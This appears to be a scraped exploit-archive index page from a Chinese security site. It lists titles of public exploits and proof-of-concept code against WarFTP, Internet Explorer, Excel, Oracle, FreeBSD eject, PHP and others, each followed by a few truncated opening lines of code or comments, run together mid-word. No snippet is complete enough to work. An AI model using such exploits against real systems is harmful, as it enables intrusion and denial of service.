网络安全 > Exploit >
WarFTP 1.65 (USER) Remote Buffer Overlow Exploit
#include <stdio.h> #include <string.h> #include <winsock.h> #define VULNSERVER "WAR-FTPD 1.65" #define VULNCMD "x55x53x45x52x20" #define ZERO 'x00' #dMojoClassifieds 2.0 Remote Blind SQL Injection Exploit
#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print " n"; print " #################### Viva IslaMe Viva IslaMe #############WFTPD Pro Server
/************************************************************************ *WFTPD server <= 3.25 SITE ADMN DoS * * * *Sending commMS Windows (MessageBox) Memory Corruption Local Denial of Service
// mbox.cs using System; using System.Runtime.InteropServices; class HelloWorldFromMicrosoft { [DllImport("user32.dll")] unsafe public static extern int MessageBoxA(uint hwnd, byte* lpText, byte* lpCaption, uint uTypBrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service
<!-- ----------------------------------------------------------------------------------------------------------- BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service author: shinnai mail: shinnai[at]autistici[dot]oMicrosoft Excel Malformed Palette Record DoS PoC (MS07-002)
MS07-002 EXCEL Malformed Palette Record Vulnerability DOS POC ###### Author ###### LifeAsaGeek at gmail.com ... and Microsoft said that vuln credit is for Greg MacManus of iDefense Labs ######################## VulMS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption
#!/usr/bin/python # MS Windows DCE-RPC svcctl ChangeServiceConfig2A() 0day Memory Corruption PoC Exploit # Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl> # Tested on Windows 2000 SP4 Polish (all patches) # # ReMS Internet Explorer (FTP Server Response) DoS Exploit
#!/usr/bin/perl # MS 07-016 FTP Server Response PoC # Usage: ./ms07016ftp.pl [LISTEN_IP] # # Tested Against: MSIE 6.02900.2180 (SP2) # # Details: The response is broken into buffers, either at length 1024, #Linux Kernel
/* Linux Kernel DCCP Memory Disclosure Vulnerability Synopsis: The Linux kernel is susceptible to a locally exploitable flaw which may allow local users to steal data from the kernel memory. Vulnerable Systems: Linux Kernel VersioEasy File Sharing FTP Server 2.0 (PASS) Remote Exploit
#!/usr/bin/python # Remote exploit for Easy File Sharing FTP server V2.0. The vulnerability # was discovered by h07 and a POC for windows XP SP2 (polish version) was # provided. This exploit was tested on windows 2000 server SP4. The explMS Internet Explorer Recordset Double Free Memory Exploit
<HTML> <!-- ********************************************************************************** Microsoft Internet Explorer ADODB.Recordset Double Free Memory Exploit (ms07-009). ***********************************************NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)
## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the coOracle 10g KUPM$MCP.MAIN SQL Injection Exploit
#!/usr/bin/perl # # Remote Oracle KUPM$MCP.MAIN exploit (10g) # # Grant or revoke dba permission to unprivileged user # # Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" # # REF: http://wwwFreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit
// ejecsploit.c - local root exploit for bsd's eject.c // harry // vuln found by kokanin (you 31337!!! ;)) // thanks to sacrine and all the other netric guys!!! you rule :) #include <stdio.h> #include <stdlib.h>PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC
<?php //////////////////////////////////////////////////////////////////////// // _ _ _ _ ___ _ _ ___ // // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ | || || _ //